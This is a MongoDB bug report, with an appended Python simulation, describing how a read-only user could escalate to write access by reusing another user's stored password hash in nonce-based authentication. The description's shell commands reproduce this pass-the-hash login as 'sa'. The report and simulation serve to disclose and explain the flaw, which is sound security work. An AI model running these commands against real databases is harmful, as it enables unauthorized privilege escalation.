[SERVER-6031] read only user can get write priority

Created: 07/Jun/12 | Updated: 15/Aug/12 | Resolved: 12/Jun/12

| Status: | Closed |
| Project: | Core Server |
| Component/s: | Security |
| Affects Version/s: | None |
| Fix Version/s: | None |
| Type: | Bug |
| Priority: | Critical - P2 |
| Reporter: | xie zhenye |
| Assignee: | Unassigned |
| Resolution: | Duplicate |
| Votes: | 0 |
| Labels: | None |
| Remaining Estimate: | Not Specified |
| Time Spent: | Not Specified |
| Original Estimate: | Not Specified |
| Environment: | all |
| Operating System: | ALL |
| Issue Links: | |
| Participants: | |

| Description |

A read-only user can get write privilege by accessing other users' pwd hash. Sample:

    > db.$cmd.findOne( {getnonce:1})
    { "nonce" : "9892be9572e9851e", "ok" : 1 }
    > db.runCommand( { authenticate : 1, user : "sa", nonce : "9892be9572e9851e", key : hex_md5("9892be9572e9851e"+"sa"+"84c689ded211fb631fd5f5dedc5d4539") })
    { "ok" : 1 }
| Comments |

| Comment by Eliot Horowitz (Inactive) [ 12/Jun/12 ] |

| Comment by Spencer Brody (Inactive) [ 07/Jun/12 ] |

Confirmed and reproduced.

| Comment by xie zhenye [ 07/Jun/12 ] |

The authentication protocol only hashes the password once. It needs to hash twice to be more secure, like sha1(sha1(user+salt+password)), and the client should send sha1(user+salt+password) to do the authentication.
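The following is an added example, not code from this report or from MongoDB: it models the two schemes discussed in this thread, the single-hash challenge-response from the description, where the stored hash is all a client needs to answer the nonce, and a nonce-bound form of the "hash twice" proposal in the comment above, where the server stores only sha1 of the value the client proves and a leaked copy of that stored value does not authenticate. The user, password, salt and the password-hash derivation are constructed for the simulation, and the XOR masking used to bind the proof to the nonce is a SCRAM-style technique added here, not the reporter's exact wording.

```python
import hashlib
import hmac
import os

# Constructed credentials for the simulation; they are not from the report.
USER, PASSWORD, SALT = "sa", "correct horse battery", "s4lt"

# Scheme 1: the challenge-response shown in the description. The server stores
# pwd_hash and the client proves key = md5(nonce + user + pwd_hash), so pwd_hash
# itself is the secret: any principal able to read it can answer the challenge.
def cr_pwd_hash(user: str, password: str) -> str:
    # Assumed derivation for the simulation; only its role as a stored secret matters.
    return hashlib.md5(f"{user}:mongo:{password}".encode()).hexdigest()

def cr_key(nonce: str, user: str, pwd_hash: str) -> str:
    return hashlib.md5((nonce + user + pwd_hash).encode()).hexdigest()

def cr_server_verify(nonce: str, user: str, key: str, stored_pwd_hash: str) -> bool:
    return hmac.compare_digest(key, cr_key(nonce, user, stored_pwd_hash))

# Scheme 2: "hash twice", made nonce-bound (SCRAM-style; not MongoDB's code).
# The client holds client_key = sha1(user+salt+password); the server stores only
# sha1(client_key), which is a verifier, not a credential.
def client_key(user: str, password: str, salt: str) -> bytes:
    return hashlib.sha1((user + salt + password).encode()).digest()

def stored_key(ckey: bytes) -> bytes:
    return hashlib.sha1(ckey).digest()

def client_proof(nonce: str, ckey: bytes) -> bytes:
    # Mask client_key with a nonce-bound signature the server can recompute from stored_key.
    sig = hmac.new(stored_key(ckey), nonce.encode(), hashlib.sha1).digest()
    return bytes(a ^ b for a, b in zip(ckey, sig))

def server_verify(nonce: str, proof: bytes, skey: bytes) -> bool:
    sig = hmac.new(skey, nonce.encode(), hashlib.sha1).digest()
    recovered = bytes(a ^ b for a, b in zip(proof, sig))  # unmask, then check the preimage
    return hmac.compare_digest(hashlib.sha1(recovered).digest(), skey)

def demo() -> tuple:
    nonce = os.urandom(8).hex()
    h1 = cr_pwd_hash(USER, PASSWORD)
    hash_only_ok = cr_server_verify(nonce, USER, cr_key(nonce, USER, h1), h1)  # True: stored hash suffices
    ck = client_key(USER, PASSWORD, SALT)
    sk = stored_key(ck)
    genuine_ok = server_verify(nonce, client_proof(nonce, ck), sk)       # True: holder of client_key
    leaked_stored_ok = server_verify(nonce, client_proof(nonce, sk), sk)  # False: stored value alone fails
    return hash_only_ok, genuine_ok, leaked_stored_ok
```

The contrast in `demo()` is the whole point of the report: in scheme 1 the stored hash is password-equivalent, so read access to it must be treated as write access; in scheme 2 the stored verifier is not enough to produce a valid proof.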